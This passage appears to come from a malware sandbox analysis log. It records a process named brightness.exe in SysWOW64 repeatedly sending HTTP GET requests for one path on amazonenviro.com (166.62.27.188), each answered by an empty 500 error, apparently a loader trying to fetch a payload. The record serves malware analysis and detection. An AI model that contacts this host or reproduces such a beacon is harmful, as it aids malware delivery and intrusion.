              Jan 10, 2025 08:59:57.663830042 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:58.616508961 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:58 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              31192.168.2.449944166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:58.760201931 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:59.679389954 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:59 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              32192.168.2.449953166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:59.819346905 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:00.750742912 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:00 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              33192.168.2.449962166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:00.895227909 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:01.827510118 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:01 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              34192.168.2.449971166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:01.967549086 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:02.918051004 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:02 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              35192.168.2.449980166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:03.048578024 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:03.977108002 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:03 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              36192.168.2.449987166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:04.103729010 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:05.036585093 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:04 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              37192.168.2.449995166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:05.166538000 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:06.095654964 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:05 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              38192.168.2.450003166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:06.225713015 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:07.151499987 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:06 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              39192.168.2.450012166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:07.278532028 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:08.226175070 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:08 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              40192.168.2.450022166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:08.356169939 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:09.292172909 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:09 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              41192.168.2.450030166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:09.419085979 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:10.347740889 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:10 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              42192.168.2.450040166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:10.475697994 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:11.411885023 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:11 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              43192.168.2.450048166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:11.540348053 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:12.471609116 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:12 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              44192.168.2.450057166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:12.616924047 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:13.547369957 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:13 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              45192.168.2.450067166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:13.677695990 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:14.621083975 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:14 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              46192.168.2.450074166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:14.748699903 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:15.668155909 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:15 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              47192.168.2.450084166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:15.795185089 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:16.716309071 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:16 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              48192.168.2.450093166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:16.843628883 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:17.776226044 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:17 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              49192.168.2.450101166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:17.908320904 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:18.830769062 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:18 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              50192.168.2.450108166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:18.966984987 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:19.910593033 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:19 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              51192.168.2.450116166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:20.043621063 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:20.966774940 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:20 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              52192.168.2.450122166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:21.133877993 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:22.050848961 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:21 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              53192.168.2.450124166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:22.187096119 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:23.134906054 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:22 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              54192.168.2.450126166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:23.276742935 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:24.223851919 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:24 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              55192.168.2.450128166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:24.359713078 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:25.264719963 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:25 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              56192.168.2.450130166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:25.447155952 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:26.358365059 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:26 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              57192.168.2.450133166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:26.492497921 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:27.422723055 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:27 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              58192.168.2.450135166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:27.609075069 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:28.527998924 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:28 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              59192.168.2.450137166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:28.664470911 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:29.615518093 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:29 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              60192.168.2.450139166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:29.742562056 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:30.650271893 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:30 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              61192.168.2.450141166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:30.776796103 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:31.708340883 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:31 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              62192.168.2.450143166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:31.846013069 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:32.800143003 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:32 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              63192.168.2.450145166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:32.937071085 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:33.891694069 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:33 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              64192.168.2.450147166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:34.067647934 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:34.989392996 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:34 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              65192.168.2.450149166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:35.124136925 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:36.047362089 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:35 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              66192.168.2.450151166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:36.183043957 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:37.089878082 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:36 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              67192.168.2.450153166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:37.217168093 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:38.136305094 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:37 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              68192.168.2.450155166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:00:38.272300959 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:00:39.222901106 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:00:39 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
